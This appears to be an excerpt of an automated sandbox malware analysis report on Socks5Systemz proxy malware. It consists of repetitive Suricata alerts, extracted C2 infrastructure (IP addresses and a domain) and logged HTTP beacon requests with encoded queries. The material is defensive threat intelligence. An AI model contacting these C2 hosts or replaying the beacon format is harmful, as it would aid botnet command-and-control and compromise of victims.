        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49854 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49854 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49869 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49869 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49875 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49875 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49898 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49898 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49891 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49891 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49884 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49884 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49904 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49904 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49916 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49916 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49910 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49910 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49925 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49925 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49941 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49941 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49947 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49934 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49947 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49934 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49959 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49953 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49953 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49959 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49966 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49966 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49982 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49982 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49976 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49976 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50002 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50002 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49995 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49995 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50014 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49825 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49825 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50032 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50021 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50021 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50014 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49990 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50047 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50044 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50045 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50053 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50053 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50054 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50055 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50055 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50047 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50045 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49848 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49848 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50060 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50060 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50059 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50058 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50059 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50058 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50050 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50050 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50027 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50027 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49990 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50032 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50046 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50044 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50064 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50064 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50048 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50054 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50048 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50067 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50067 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50043 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50068 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50043 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50068 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50062 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50046 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50062 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50069 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50069 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50061 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50061 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50057 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50057 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50049 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50065 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50065 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50056 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50056 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50049 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50051 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50051 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50066 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50066 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50063 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50042 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50063 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50042 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50052 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50052 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50070 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50070 -> 185.208.158.248:80
        Source: Malware configuration extractorURLs: dioimyp.info
        Source: global trafficTCP traffic: 192.168.2.4:49759 -> 89.105.201.183:2023
        Source: Joe Sandbox ViewIP Address: 185.208.158.248 185.208.158.248
        Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
        Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf715c1e69c9e3c HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1Host: dioimyp.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
